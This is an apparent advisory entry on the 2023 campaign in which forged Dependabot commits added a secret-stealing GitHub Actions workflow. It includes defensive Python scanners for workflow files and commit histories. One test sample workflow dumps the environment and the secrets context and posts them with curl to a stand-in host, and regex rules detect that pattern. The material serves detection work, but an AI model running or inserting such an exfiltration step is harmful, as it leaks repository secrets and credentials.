SC-DEPENDABOT-IMPERSONATION-2023
CI/CD · GitHub · GitHub repositories (Dependabot impersonation)
Summary
Between July 8 and July 11, 2023, in a campaign documented by Checkmarx, attackers pushed malicious commits to hundreds of public and private GitHub repositories while disguising them as automated contributions from the legitimate Dependabot bot. The attackers obtained victims' GitHub Personal Access Tokens, likely exfiltrated from developer machines via a malicious open-source package, and used those tokens to push commits whose author and commit message ('fix') were falsified to appear as the dependabot[bot] account, since Git and the GitHub API let a token holder set arbitrary commit metadata and PAT activity does not surface in the account audit log.

Each malicious commit added a GitHub Actions workflow file (hook.yml) that triggered on every push and exfiltrated the project's defined secrets and environment variables to an attacker-controlled command-and-control server. The same commits modified existing JavaScript files in the repository, injecting obfuscated web-form password-stealer code that captured credentials submitted by end users and forwarded them to the same server.

Most affected accounts belonged to Indonesian developers.
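As an added example (not part of this advisory and not Checkmarx's tooling), the following Python script applies text heuristics to workflow files to catch the behaviour described above: a workflow that fires on every push, serialises secrets or the runner environment, and sends them to a non-GitHub host. The rule names, regexes and both sample workflows are constructed for illustration; the suspicious sample uses a reserved .invalid host name. It reads the YAML as plain text, so it needs no third-party parser and can run inside a pre-receive hook or a scheduled repository scan.

```python
"""Heuristic scanner for GitHub Actions workflow files that behave like the
hook.yml described above: fire on every push, serialise secrets or the
environment, and send them to an external host.

Added example, not code from the original advisory or from Checkmarx. The rule
names, the regexes and both sample workflows are constructed for illustration;
the scanner reads the YAML as text so it needs no third-party parser.
"""
import re
from typing import List

# Constructed sample: a benign workflow that runs lint on pull requests.
BENIGN_WORKFLOW = """\
name: lint
on:
  pull_request:
jobs:
  lint:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm run lint
"""

# Constructed sample shaped like the behaviour described above (the host is
# a reserved .invalid name, not a real command-and-control server).
SUSPICIOUS_WORKFLOW = """\
name: hook
on: push
jobs:
  run:
    runs-on: ubuntu-latest
    steps:
      - run: |
          env > /tmp/e
          echo '${{ toJSON(secrets) }}' > /tmp/s
          curl -s -X POST --data-binary @/tmp/e https://c2.example.invalid/collect
"""

# Source rules (something that exposes secrets) and a sink rule (something
# that ships data off the runner to a non-GitHub host). Assumed heuristics.
RULES = [
    ("secrets_context_dump", re.compile(r"toJSON\(\s*secrets\s*\)")),
    ("env_dump", re.compile(r"(?m)^[ \t]*env[ \t]*(>|\|)")),
    ("outbound_transfer",
     re.compile(r"\b(curl|wget)\b[^\n]*https?://(?!(api\.)?github\.com)")),
]
SOURCE_RULES = {"secrets_context_dump", "env_dump"}


def triggers_on_push(text: str) -> bool:
    """True if the 'on:' block includes a push trigger (inline or block form)."""
    lines = text.splitlines()
    for i, line in enumerate(lines):
        m = re.match(r"^on:[ \t]*(.*)$", line)
        if not m:
            continue
        inline = m.group(1).strip()
        if inline:                      # on: push  /  on: [push, pull_request]
            return re.search(r"\bpush\b", inline) is not None
        for nxt in lines[i + 1:]:       # on:\n  push:\n    branches: ...
            if nxt.strip() and not nxt.startswith(" "):
                break                   # left the indented 'on:' block
            if re.match(r"^[ \t]+push[ \t]*:?[ \t]*$", nxt):
                return True
        return False
    return False


def scan_workflow(text: str) -> List[str]:
    """Return the names of every rule the workflow text matches, in order."""
    hits = ["push_trigger"] if triggers_on_push(text) else []
    hits += [name for name, rx in RULES if rx.search(text)]
    return hits


def is_suspicious(text: str) -> bool:
    """Flag only when a secret source and an outbound sink appear together,
    which keeps ordinary 'curl the release API' steps from tripping it."""
    hits = set(scan_workflow(text))
    return bool(hits & SOURCE_RULES) and "outbound_transfer" in hits


if __name__ == "__main__":
    for label, wf in (("benign", BENIGN_WORKFLOW), ("hook", SUSPICIOUS_WORKFLOW)):
        print(label, scan_workflow(wf), "SUSPICIOUS" if is_suspicious(wf) else "ok")
```

The source-plus-sink requirement is the important design choice: a workflow that merely calls curl, or merely references the secrets context, is normal; the combination is what the campaign relied on. A push trigger on its own is only reported as context, since many legitimate workflows use it.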
How to avoid it in your code
- Replace long-lived PATs with short-lived, fine-grained, least-privilege tokens.
- Require signed commits and verify the 'Verified' badge rather than trusting author names.
- Monitor for unexpected workflow files and commits attributed to bots.
- Rotate any exposed PATs immediately and audit repository secrets.
- Scan dependencies and developer machines for credential-stealing packages.
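The signed-commit and monitoring items above can be checked together over a repository's commit history. The following Python script is an added example, not the advisory's own tooling: it takes commit records in the shape of the GitHub REST API commit responses (`commit.author`, `commit.verification.verified`, `files[].filename` and `files[].status`) and flags commits whose author claims a `[bot]` identity without a verified signature, plus any commit that adds or modifies a file under `.github/workflows/`. The three sample records are constructed; the author e-mail addresses use `.invalid` and are not the real bot's address.

```python
"""Audit commit records for bot impersonation and workflow-file changes.

Added example, not part of the original advisory or Checkmarx's research.
Input records mirror the shape of the GitHub REST API commit responses
(commit.author, commit.verification, files[]); the sample records below are
constructed for illustration.
"""
import re
from typing import Dict, List

WORKFLOW_DIR = ".github/workflows/"
BOT_NAME = re.compile(r"\[bot\]$")

# Constructed samples: a verified bot commit, a forged one matching the
# campaign above (unverified, message 'fix', adds a workflow file and touches
# a JavaScript file), and an ordinary unsigned human commit.
SAMPLE_COMMITS = [
    {
        "sha": "aaaa000000000000000000000000000000000001",
        "commit": {
            "author": {"name": "dependabot[bot]", "email": "dependabot[bot]@example.invalid"},
            "message": "Bump lodash from 4.17.20 to 4.17.21",
            "verification": {"verified": True, "reason": "valid"},
        },
        "files": [{"filename": "package.json", "status": "modified"}],
    },
    {
        "sha": "bbbb000000000000000000000000000000000002",
        "commit": {
            "author": {"name": "dependabot[bot]", "email": "dependabot[bot]@example.invalid"},
            "message": "fix",
            "verification": {"verified": False, "reason": "unsigned"},
        },
        "files": [
            {"filename": ".github/workflows/hook.yml", "status": "added"},
            {"filename": "public/js/login.js", "status": "modified"},
        ],
    },
    {
        "sha": "cccc000000000000000000000000000000000003",
        "commit": {
            "author": {"name": "Jane Developer", "email": "jane@example.invalid"},
            "message": "Add CI lint job",
            "verification": {"verified": False, "reason": "unsigned"},
        },
        "files": [{"filename": ".github/workflows/lint.yml", "status": "added"}],
    },
]


def audit_commit(commit: Dict) -> List[str]:
    """Return the findings for one commit record (empty list if clean)."""
    findings: List[str] = []
    meta = commit["commit"]
    author = meta.get("author", {}).get("name", "")
    verified = bool(meta.get("verification", {}).get("verified", False))

    # The author field is free text that any token holder can set; only a
    # verified signature ties a bot-named commit to GitHub's real bot account.
    unverified_bot = BOT_NAME.search(author) is not None and not verified
    if unverified_bot:
        findings.append(f"bot author '{author}' without verified signature")

    workflow_changes = [
        f for f in commit.get("files", [])
        if f.get("filename", "").startswith(WORKFLOW_DIR)
        and f.get("status") in ("added", "modified")
    ]
    for f in workflow_changes:
        findings.append(f"workflow file {f['status']}: {f['filename']}")

    # Both signals together are the exact pattern of the campaign above.
    if unverified_bot and workflow_changes:
        findings.append("HIGH: workflow change pushed under an unverified bot identity")
    return findings


def audit(commits: List[Dict]) -> Dict[str, List[str]]:
    """Map commit SHA -> findings for every commit that has at least one."""
    result = {}
    for c in commits:
        findings = audit_commit(c)
        if findings:
            result[c["sha"]] = findings
    return result


if __name__ == "__main__":
    for sha, notes in audit(SAMPLE_COMMITS).items():
        print(sha[:12])
        for note in notes:
            print("  -", note)
```

Any workflow change is reported so a reviewer can look at it, but only the combination of a forged bot identity and a workflow change is rated HIGH; the unsigned human commit adding lint.yml above is ordinary activity and is listed without escalation.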
Related vulnerabilities
- CRITICAL GHSA-4XPC-PV4P-PM3W
  LiteLLM: Authentication Bypass via Host Header Injection
- MEDIUM GHSA-X7CF-6GP3-Q5F8
  Duplicate Advisory: MCP Streamable HTTP redirects could forward configured custom headers to another origin
- HIGH GHSA-F59H-Q822-G45G
  Caddy: FastCGI header normalization bypass in `forward_auth copy_headers`
- HIGH GHSA-F989-C77F-R2CQ
  Crawl4AI: LLM credential exfiltration in Docker server via request base_url and env: token resolution
- MEDIUM GHSA-JVC7-762P-3743
  n8n: Missing Token Validation on Microsoft Agent 365 Trigger and Stripe Nodes
- HIGH SC-ARTIPACKED-2024
  On August 13, 2024, Palo Alto Networks Unit 42 published ArtiPACKED, a widespread CI/CD misconfiguration class in which GitHub Actions build artifacts inadvertently leaked authentication tokens, affecting major open-source projects from Google, Microsoft, Red Hat, AWS, Canonical, and OWASP. The root cause is that actions/checkout persists credentials by default, writing the workflow's GITHUB_TOKEN into the checked-out .git/config for authenticated Git operations; when a later step uploaded the workspace (test results, build output, or the full checkout directory) via actions/upload-artifact, the .git directory and its embedded token, along with environment-derived secrets and cloud credentials, were packaged into the downloadable artifact. Because v4 artifacts can be downloaded while the run is still in progress and are readable by anyone for public repositories, an attacker could win a race condition: download the artifact, extract the still-valid GITHUB_TOKEN before the job completed and the token expired, and use it to push code, create branches, or pivot into connected cloud environments. Unit 42 identified numerous large projects leaking tokens this way and disclosed each responsibly for remediation.